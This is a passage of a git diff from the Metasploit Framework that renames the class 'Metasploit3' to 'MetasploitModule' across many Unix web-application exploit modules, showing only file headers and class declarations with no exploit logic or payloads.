Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb index a48ba48d99..ab54eecfc5 100644 --- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb +++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 5d2cb35756..1e7eb42741 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 5286bf927d..15e2279e94 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb index 51c9a53ffa..3b8111d4b0 100644 --- a/modules/exploits/unix/webapp/kimai_sqli.rb +++ b/modules/exploits/unix/webapp/kimai_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index b68a39ed2e..af5e4c5445 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index 8524edfb3a..f12ba7d45d 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb +++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index ad270f3590..a3d237047f 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb index 8179ffc36a..943f3d32ac 100644 --- a/modules/exploits/unix/webapp/mitel_awc_exec.rb +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb index 1f0f109a81..1a558a3e0d 100644 --- a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb +++ b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index 3f92aa03d9..084d6f44b9 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index 3f0ec69676..9329442d45 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index dde396f3d6..75bd25e80d 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb index 44a9e6123d..3f39baba91 100644 --- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb +++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index 8660cf678d..6a18933811 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index e7d56fcd2f..2a83f31155 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index 8e91a2ef42..3b0a3a3eb1 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index df8f0518c8..cd9dac9f8b 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 25611c3bcb..1c7a6a73b5 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index d271d446fa..01606273b0 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index d76318ede7..c6a695a8d5 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index c9afc417e0..6efb784256 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 51d6d0c8f9..b3e1bf3bbd 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index d53edeb6e2..711533e4f3 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 3c4ca54256..b33f1a45bc 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index 4c57758421..07671c52e1 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 960c8387dd..5ce9472bb2 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index c8edda9b97..a4c51d6f03 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index 996a060a4b..dc6584ece0 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 009305625b..92159e9983 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 9775cd9fb0..2505a8901e 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 71382a1f17..6149f0a6cf 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/projectsend_upload_exec.rb b/modules/exploits/unix/webapp/projectsend_upload_exec.rb index e01415cfb4..0600c02ad9 100644 --- a/modules/exploits/unix/webapp/projectsend_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectsend_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb index 5e43183164..90cab50a10 100644 --- a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb +++ b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index 113f7cc419..fa917c7e4e 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/seportal_sqli_exec.rb b/modules/exploits/unix/webapp/seportal_sqli_exec.rb index 8f8da55d8e..f71b7fd44c 100644 --- a/modules/exploits/unix/webapp/seportal_sqli_exec.rb +++ b/modules/exploits/unix/webapp/seportal_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb index 4d18db356b..b0e2edb30b 100644 --- a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 9a75e1d9cb..80294d38ef 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb index 5575ae12fc..3f4535f7cc 100644 --- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index fdfed0a499..1633e81cde 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index 06bd9ecd7c..5d7cc5c5e9 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb index a8303ca871..bd489e6b3a 100644 --- a/modules/exploits/unix/webapp/squash_yaml_exec.rb +++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index a116da0fa5..61eba13594 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 918ff7cfb7..a659def99d 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 04e6167531..de46b20848 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index a1ba47c228..4d46b0051f 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index 3f6e06931e..0839e46091 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 817d0d3a3e..777ae27a6c 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -6,7 +6,7 @@ # -*- coding: utf-8 -*- require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\w+)(?:;|$)/ diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index ac13d101db..56144a5917 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 0e2e00d06c..6cc5113f2e 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index c371316749..73207fd2a9 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 95ed12f2fe..183f696ffb 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index 373ad569cc..6f94c0aa4e 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index 45c8bbe1cf..01ea8823c6 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 1579b33cc9..c058cbf271 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 5817ebf9d4..bf55cd2c70 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index 1ab30f176f..1b498ca2ea 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index 008317ea7f..b76d8d9fdd 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb index 06b6f4b909..247a904595 100644 --- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index dc6b8ca785..fec5e636cb 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb index f86704f106..f9ac0917a8 100644 --- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb index ced2ed7f8c..711a3c81ec 100644 --- 